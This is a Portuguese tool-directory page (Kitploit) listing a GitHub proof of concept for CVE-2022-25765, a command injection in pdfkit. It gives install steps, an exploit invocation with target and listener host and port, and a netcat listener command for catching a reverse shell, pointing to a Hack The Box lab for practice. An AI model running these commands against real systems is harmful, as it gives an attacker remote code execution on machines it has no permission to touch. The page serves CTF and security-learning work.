Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-25765 — Prova de conceito em Python para CVE-2022-25765, uma vulnerabilidade de injeção de comandos no pdfkit, que permite execução remota de código por meio de geração de PDF manipulada. | Kitploit
Ferramentas/GitHubGitHub/innocentx0/cve-2022-25765
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

Prova de conceito em Python para CVE-2022-25765, uma vulnerabilidade de injeção de comandos no pdfkit, que permite execução remota de código por meio de geração de PDF manipulada.

Ver Repositório
há 16h 55mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-25765 — pdfkit

PoC para CVE-2022-25765, que afeta versões vulneráveis do pdfkit.

Testado com pdfkit 0.8.6.

Requisitos

  • Python 3.x
  • requests
  • colorama

Instale as dependências:

root@kitploit:~
pip3 install -r requirements.txt

Ou manualmente:

root@kitploit:~
pip3 install requests colorama

Uso

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

Exemplo: Execute um listener

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

Configuração

Clone o repositório:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

Instale os requisitos:

root@kitploit:~
pip3 install -r requirements.txt

Execute o PoC contra o seu alvo de laboratório.

Vulnerabilidade

CVE-2022-25765 é uma vulnerabilidade de injeção de comandos em versões vulneráveis do pdfkit.

O problema está relacionado à sanitização insuficiente da entrada controlada pelo usuário passada ao processo de geração de PDF.

Notas

Este PoC foi feito principalmente para aprendizado e ambientes de CTF/laboratório.

Se você está procurando um lugar para testá-lo, Hack The Box: Máquina: Precious.

Aviso Legal

Use isto apenas contra sistemas que você possui ou para os quais tem permissão explícita para testar.

Não sou responsável por uso indevido ou danos causados por este projeto.


INNOCENTx0

Baixar ferramenta